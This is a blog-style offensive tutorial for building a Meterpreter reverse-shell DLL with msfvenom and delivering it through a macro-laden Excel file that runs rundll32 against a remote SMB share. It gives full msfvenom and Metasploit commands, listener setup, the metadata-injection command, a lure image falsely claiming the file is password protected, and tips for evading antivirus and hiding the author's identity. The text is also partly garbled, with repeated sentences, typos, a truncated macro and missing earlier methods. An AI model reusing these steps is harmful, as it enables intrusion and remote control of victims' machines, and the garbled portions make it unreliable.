msfvenom malicious DLL
DLL injection on Metasploit is a technique which allows an attacker to run arbitrary code in in the memory of another process. If this process is running with escalated privileges then it could be abused by an attacker in order to execute malicious code in the form of a DLL file in order to elevate privileges for other malware. The Metasploit SMB Delivery exploit module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell
I want to point out I used the blog published on Kai Stimpson for this article found at https://www.processlibrary.com/en/directory/files/rundll32/2574 I highly recommend going this blog and looking at all the great stuff they are doing over there.
Create a backdoor on the target machine by creating a malicious DLL file that is actually very similar as using msfvenom.
Leverage this to embed a malicious reverse TCP payload into an executable.
Create an evil DLL file on your attacker system using Metasploit.
Create a system that allows the victim to communicate back to the attacker system.
Create a listener service on the attack machine.
Here are the steps to accomplish this one:
Create an evil DLL file on your attacker system.
Setup a command and control listener on your attacker machine.
Distribute the DLL file to a victim and have them run the DLL via RUN32DLL.
Create a backdoor by creating a malicious DLL file is actually very similar as using msfvenom to embed a malicious reverse TCP payload in an executable.
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST=192.168.2.100 LPORT=53>./evil.dll (see Figure 8).
We have now created a new malicious DLL file called evil.dll.
Setup Command and Control Listener. Run the following commands:
Get to mfsconsole
set LHOST 192.168.2.100
set LPORT 535. Set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
Your last step will be to load the malicious DLL file onto the victim’s system’s and have them use rundll32.exe to execute the DLL:
rundll32.exe evil.dll Control_RunDLL
Wait a minute! For this attack to work, I actually need to somehow get the victim machine to run the above command. That does not seem like an easy thing to do.
Even if we did somehow get the client to run the attack, when we test the malware file against VirusTotal we can see a vast majority of vendors detect the attack. It is detected by more security vendors than our first method as shown in Figure 9 (notice we did not use an encoder when we created our malicious DLL, which may explain why security products are detecting it).
Method 3: Remote DLL execution
Note: this is a very basic demonstration. We will go into much more complex scenarios in future blogs. For us to make the malware more effective, we need to make it fileless. How do we do that? Essentially we need to do two things:
Host the DLL on an accessible web server.
Remotely execute the DLL file without downloading it on disk.
There are multiple methods to achieve the first step. We will use the SMB Delivery Payload in Metasploit. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and Powershell.
The first step is to create a malicious DLL on an accessible web server. We can do this in the Metasplopit Framework (Figure 10 depicts the steps outlined below):
A. use exploit/windows/smb/smb_delivery
B. set PAYLOAD windows/meterpreter/reverse_https
C. set LPORT 535E: set LHOST (don't forget this step)
Metasploit will give you a URL that looks similar to:
Your URL might be different. You need to execute this command from the CLI on a Windows host.
The next step will be to embed this script into an office document.
I just want to point out I used Kai Stimpson’s article on the website Stealing The Network as my primary source. It is a great website and I strongly encourage everyone to check out the great work they are doing over there. Here is a link to the original blog:
We will start by downloading Commentator GitHub repository for a Windows machine. You will need to create the malicious Excel document on a Windows Machine for this to work properly.
Open a PowerShell terminal from the Windows command line with 'powershell.exe -exec bypass' and change directories to whereps1 is located (Figure 11).
Type 'Import-Module .\Commentator.ps1'. (Figure 12).
The following command will insert a comment of "Put your big long comment here" into a copy of the file NoComment.xlsx in the current directory. The new file will have "-wlc" appended to the file name.
Make sure you have an existing Excel file created. You should ideally put this in the Excel file in the same directory as the downloaded PS script.
Run Powershell with the following command:
exe -exec bypass
Import the PowerShell script you downloaded (make sure you are in the correct directory). Import-Module .\Commentator.ps1
Add comments to Excel file with the PowerShell command
Invoke Commentator -OfficeFile .\bad-excel.xlsx -Comment "rundll32.exe \\192.168.174.161\jheTXX\test.dll,0" (see Figure 13).
When the process is complete, a copy of your file with the comment will be created as a copy of the file ending with wlc. (Figure 14)
You can check the comment by clicking on the properties of the files and looking under details (Figure 15).
You Should probably clear other metadata that can be used to link you back as a creator of the document. Here is one more tip: The PowerShell script just makes it easier for us to add comments in the metadata. This can be useful if you have multiple files and want to script the injection of the comments. I know sometimes these scripts just fail for various reasons. There is nothing stopping you from adding a comment yourself. Just copy the entire command (you don’t need the quotes), open up Excel, go the File Menu, and under info add the comment. Make sure you save the file as a xls (Office 97 - 2003) file.
We now need to create a macro in the document that will run the command in the comment section, We are going to use the following code:
Dim p As DocumentProperty
For Each p In ActiveWorkbook.BuiltinDocumentProperties
If p.Name = "Comments" Then
(Figure 16 shows us entering and saving the macro)
Process: Social Engineering
The file itself should not be detected as malware although just the action of the macro calling a network address might be seen as a malicious or suspicious activity. In future blogs I will show how use evasion techniques on the macro code itself.
Figure 17 shows all AV vendors detect the file as clean.
Even if you have different results this is ok, there are different methods we can use obfuscate our macro code which we will show in future posts.
When the user opens the file in most versions of Excel they will get yellow bar stating they need to run and enable additional content. We added a picture on the first sheet (Figure 18) that shows the user they are getting this because the file is password protected and they need enable it to view the file. Note that the file is not really protected - we are just trying to get them to enable macros.
Here is the image (Figure 19) I used by itself if you wanted a copy (source: https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-1-of-2/)
In the video below we show the entire attack